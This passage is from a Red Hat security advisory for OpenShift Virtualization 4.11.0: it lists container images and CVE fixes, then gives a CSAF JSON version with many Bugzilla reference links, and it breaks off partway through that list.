kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7
kubevirt-tekton-tasks-copy-template-container-v4.11.0-7
checkup-framework-container-v4.11.0-67
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7
vm-network-latency-checkup-container-v4.11.0-67
kubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7
hyperconverged-cluster-webhook-container-v4.11.0-95
cnv-must-gather-container-v4.11.0-62
hyperconverged-cluster-operator-container-v4.11.0-95
kubevirt-console-plugin-container-v4.11.0-83
virt-controller-container-v4.11.0-105
virt-handler-container-v4.11.0-105
virt-operator-container-v4.11.0-105
virt-launcher-container-v4.11.0-105
virt-artifacts-server-container-v4.11.0-105
virt-api-container-v4.11.0-105
libguestfs-tools-container-v4.11.0-105
hco-bundle-registry-container-v4.11.0-587
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)
* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.11.0 images:\n\nRHEL-8-CNV-4.11\n===============\nhostpath-provisioner-container-v4.11.0-21\nkubevirt-tekton-tasks-operator-container-v4.11.0-29\nkubevirt-template-validator-container-v4.11.0-17\nbridge-marker-container-v4.11.0-26\nhostpath-csi-driver-container-v4.11.0-21\ncluster-network-addons-operator-container-v4.11.0-26\novs-cni-marker-container-v4.11.0-26\nvirtio-win-container-v4.11.0-16\novs-cni-plugin-container-v4.11.0-26\nkubemacpool-container-v4.11.0-26\nhostpath-provisioner-operator-container-v4.11.0-24\ncnv-containernetworking-plugins-container-v4.11.0-26\nkubevirt-ssp-operator-container-v4.11.0-54\nvirt-cdi-uploadserver-container-v4.11.0-59\nvirt-cdi-cloner-container-v4.11.0-59\nvirt-cdi-operator-container-v4.11.0-59\nvirt-cdi-importer-container-v4.11.0-59\nvirt-cdi-uploadproxy-container-v4.11.0-59\nvirt-cdi-controller-container-v4.11.0-59\nvirt-cdi-apiserver-container-v4.11.0-59\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.0-7\ncheckup-framework-container-v4.11.0-67\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7\nvm-network-latency-checkup-container-v4.11.0-67\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7\nhyperconverged-cluster-webhook-container-v4.11.0-95\ncnv-must-gather-container-v4.11.0-62\nhyperconverged-cluster-operator-container-v4.11.0-95\nkubevirt-console-plugin-container-v4.11.0-83\nvirt-controller-container-v4.11.0-105\nvirt-handler-container-v4.11.0-105\nvirt-operator-container-v4.11.0-105\nvirt-launcher-container-v4.11.0-105\nvirt-artifacts-server-container-v4.11.0-105\nvirt-api-container-v4.11.0-105\nlibguestfs-tools-container-v4.11.0-105\nhco-bundle-registry-container-v4.11.0-587\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6526", url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1937609", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1937609", }, { category: "external", summary: "1945593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1945593", }, { category: "external", summary: "1968514", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1968514", }, { category: "external", summary: "1993109", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1993109", }, { category: "external", summary: "1994604", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1994604", }, { category: "external", summary: "2001385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2001385", }, { category: "external", summary: "2009793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2009793", }, { category: "external", summary: "2010318", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2010318", }, { category: "external", summary: "2025276", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025276", }, { category: "external", summary: "2025401", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025401", }, { category: "external", summary: "2026357", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2026357", }, { category: "external", summary: "2029349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2029349", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2031857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2031857", }, { category: "external", summary: "2033077", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2033077", }, { category: "external", summary: "2035344", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2035344", }, { category: "external", summary: "2036676", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2036676", }, { category: "external", summary: "2039976", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2039976", }, { category: "external", summary: "2040766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040766", }, { category: "external", summary: "2041467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2041467", }, { category: "external", summary: "2042402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042402", }, { category: "external", summary: "2042809", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042809", }, { category: "external", summary: "2045086", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045086", }, { category: "external", summary: "2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "2047186", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2047186", }, { category: "external", summary: "2051899", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2051899", }, { category: "external", summary: "2052094", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052094", }, { category: "external", summary: "2052466", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052466", }, { category: "external", summary: "2052689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052689", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2056467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2056467", }, { category: "external", summary: "2057157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057157", }, { category: "external", summary: "2057310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057310", }, { category: "external", summary: "2058149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058149", }, { category: "external", summary: "2058925", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058925", }, { category: "external", summary: "2059121", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059121", }, { category: "external", summary: "2060485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060485", }, { category: "external", summary: "2060585", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060585", }, { category: "external", summary: "2061208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061208", }, { category: "external", summary: "2061723", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061723", }, { category: "external", summary: "2063540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063540", }, { category: "external", summary: "2063792", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063792", }, { category: "external", summary: "2064034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064034", }, { category: "external", summary: "2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "2064936", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064936", }, { category: "external", summary: "2065014", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065014", }, { category: "external", summary: "2065019", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065019", }, { category: "external", summary: "2066768", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2066768", }, { category: "external", summary: "2067246", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2067246", }, { category: "external", summary: "2069287", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069287", }, { category: "external", summary: "2069388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069388", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2070864", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070864", }, { category: "external", summary: "2071488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071488", }, { category: "external", summary: "2071549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071549", }, { category: "external", summary: "2071611", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071611", }, { category: "external", summary: "2071921", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071921", }, { category: "external", summary: "2073669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073669", }, { category: "external", summary: "2073679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073679", }, { category: "external", summary: "2073982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073982", }, { category: "external", summary: "2074337", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2074337", }, { category: "external", summary: "2075200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075200", }, { category: "external", summary: "2075409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075409", }, { category: "external", summary: "2076292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076292", }, { category: "external", summary: "2076379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076379", }, { category: "external", summary: "2076790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076790", }, { category: "external", summary: "2076908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076908", }, { category: "external", summary: "2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "2078700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078700", }, { category: "external", summary: "2078703", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078703", }, { category: "external", summary: "2078709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078709", }, { category: "external", summary: "2078728", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078728", }, { category: "external", summary: "2079366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079366", }, { category: "external", summary: "2079674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079674", }, { category: "external", summary: "2079783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079783", }, { category: "external", summary: "2080132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080132", }, { category: "external", summary: "2080155", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080155", }, { category: "external", summary: "2080547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080547", }, { category: "external", summary: "2080833", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080833", }, { category: "external", summary: "2080835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080835", }, { category: "external", summary: "2081182", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081182", }, { category: "external", summary: "2081202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081202", }, { category: "external", summary: "2081409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081409", }, { category: "external", summary: "2081671", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081671", }, { category: "external", summary: "2081831", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081831", }, { category: "external", summary: "2082008", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082008", }, { category: "external", summary: "2082164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082164", }, { category: "external", summary: "2082912", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082912", }, { category: "external", summary: "2083093", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083093", }, { category: "external", summary: "2083097", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083097", }, { category: "external", summary: "2083100", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083100", }, { category: "external", summary: "2083101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083101", }, { category: "external", summary: "2083135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083135", }, { category: "external", summary: "2083256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083256", }, { category: "external", summary: "2083595", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083595", }, { category: "external", summary: "2084102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084102", }, { category: "external", summary: "2084122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084122", }, { category: "external", summary: "2084418", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084418", }, { category: "external", summary: "2084431", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084431", }, { category: "external", summary: "2084476", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084476", }, { category: "external", summary: "2084532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084532", }, { category: "external", summary: "2084610", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084610", }, { category: "external", summary: "2085320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085320", }, { category: "external", summary: "2085322", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085322", }, { category: "external", summary: "2086272", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086272", }, { category: "external", summary: "2086278", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086278", }, { category: "external", summary: "2086281", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086281", }, { category: "external", summary: "2086286", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086286", }, { category: "external", summary: "2086293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086293", }, { category: "external", summary: "2086294", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086294", }, { category: "external", summary: "2086303", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086303", }, { category: "external", summary: "2086479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086479", }, { category: "external", summary: "2086486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086486", }, { category: "external", summary: "2086488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086488", }, { category: "external", summary: "2086769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086769", }, { category: "external", summary: "2086803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086803", }, { category: "external", summary: "2086825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086825", }, { category: "external", summary: "2086849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086849", }, { category: "external", summary: "2087188", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087188", }, { category: "external", summary: "2087189", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087189", }, { category: "external", summary: "2087232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087232", }, { category: "external", summary: "2087546", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087546", }, { category: "external", summary: "2087547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087547", }, { category: "external", summary: "2087559", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087559", }, { category: "external", summary: "2087566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087566", }, { category: "external", summary: "2087570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087570", }, { category: "external", summary: "2087577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087577", }, { category: "external", summary: "2087578", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087578", }, { category: "external", summary: "2087582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087582", }, { category: "external", summary: "2087583", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087583", }, { category: "external", summary: "2087584", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087584", }, { category: "external", summary: "2087587", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087587", }, { category: "external", summary: "2087589", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087589", }, { category: "external", summary: "2087590", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087590", }, { category: "external", summary: "2087593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087593", }, { category: "external", summary: "2087603", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087603", }, { category: "external", summary: "2087616", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087616", }, { category: "external", summary: "2087701", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087701", }, { category: "external", summary: "2087717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087717", }, { category: "external", summary: "2088034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088034", }, { category: "external", summary: "2088355", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088355", }, { category: "external", summary: "2088361", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088361", }, { category: "external", summary: "2088379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088379", }, { category: "external", summary: "2088407", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088407", }, { category: "external", summary: "2088471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088471", }, { category: "external", summary: "2088472", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088472", }, { category: "external", summary: "2088477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088477", }, { category: "external", summary: "2088849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088849", }, { category: "external", summary: "2089078", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089078", }, { category: "external", summary: "2089271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089271", }, { category: "external", summary: "2089327", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089327", }, { category: "external", summary: "2089376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089376", }, { category: "external", summary: "2089477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089477", }, { category: "external", summary: "2089700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089700", }, { category: "external", summary: "2089745", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089745", }, { category: "external", summary: "2089789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089789", }, { category: "external", summary: "2089825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089825", }, { category: "external", summary: "2089836", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089836", }, { category: "external", summary: "2089840", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089840", }, { category: "external", summary: "2089877", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089877", }, { category: "external", summary: "2089932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089932", }, { category: "external", summary: "2089942", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089942", }, { category: "external", summary: "2089954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089954", }, { category: "external", summary: "2089963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089963", }, { category: "external", summary: "2089967", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089967", }, { category: "external", summary: "2089970", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089970", }, { category: "external", summary: "2089972", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089972", }, { category: "external", summary: "2089979", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089979", }, { category: "external", summary: "2089982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089982", }, { category: "external", summary: "2090035", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090035", }, { category: "external", summary: "2090036", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090036", }, { category: "external", summary: "2090037", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090037", }, { category: "external", summary: "2090038", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090038", }, { category: "external", summary: "2090042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090042", }, { category: "external", summary: "2090043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090043", }, { category: "external", summary: "2090046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090046", }, { category: "external", summary: "2090048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090048", }, { category: "external", summary: "2090054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090054", }, { category: "external", summary: "2090055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090055", }, { category: "external", summary: "2090056", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090056", }, { category: "external", summary: "2090057", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090057", }, { category: "external", summary: "2090059", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090059", }, { category: "external", summary: "2090064", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090064", }, { category: "external", summary: "2090066", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090066", }, { category: "external", summary: "2090068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090068", }, { category: "external", summary: "2090131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090131", }, { category: "external", summary: "2090350", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090350", }, { category: "external", summary: "2091003", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091003", }, { category: "external", summary: "2091058", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091058", }, { category: "external", summary: "2091309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091309", }, { category: "external", summary: "2091406", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091406", }, { category: "external", summary: "2091754", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091754", }, { category: "external", summary: "2091755", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091755", }, { category: "external", summary: "2091756", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091756", }, { category: "external", summary: "2091758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091758", }, { category: "external", summary: "2091760", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091760", }, { category: "external", summary: "2091761", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091761", }, { category: "external", summary: "2091762", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091762", }, { category: "external", summary: "2091764", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091764", }, { category: "external", summary: "2091765", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091765", }, { category: "external", summary: "2091766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091766", }, { category: "external", summary: "2091853", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091853", }, { category: "external", summary: "2091863", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091863", }, { category: "external", summary: "2091868", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091868", }, { category: "external", summary: "2091889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091889", }, { category: "external", summary: "2091897", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091897", }, { category: "external", summary: "2091904", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091904", }, { category: "external", summary: "2091911", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091911", }, { category: "external", summary: "2091940", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091940", }, { category: "external", summary: "2091945", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091945", }, { category: "external", summary: "2091946", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091946", }, { category: "external", summary: "2091982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091982", }, { category: "external", summary: "2092048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092048", }, { category: "external", summary: "2092052", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092052", }, { category: "external", summary: "2092071", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092071", }, { category: "external", summary: "2092079", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092079", }, { category: "external", summary: "2092158", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092158", }, { category: "external", summary: "2092228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092228", }, { category: "external", summary: "2092230", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092230", }, { category: "external", summary: "2092306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092306", }, { category: "external", summary: "2092337", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092337", }, { category: "external", summary: "2092359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092359", }, { category: "external", summary: "2092654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092654", }, { category: "external", summary: "2092662", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092662", }, { category: "external", summary: "2092663", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092663", }, { category: "external", summary: "2092664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092664", }, { category: "external", summary: "2092781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092781", }, { category: "external", summary: "2092783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092783", }, { category: "external", summary: "2092787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092787", }, { category: "external", summary: "2092789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092789", }, { category: "external", summary: "2092951", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092951", }, { category: "external", summary: "2093282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093282", }, { category: "external", summary: "2093691", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093691", }, { category: "external", summary: "2093713", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093713", }, { 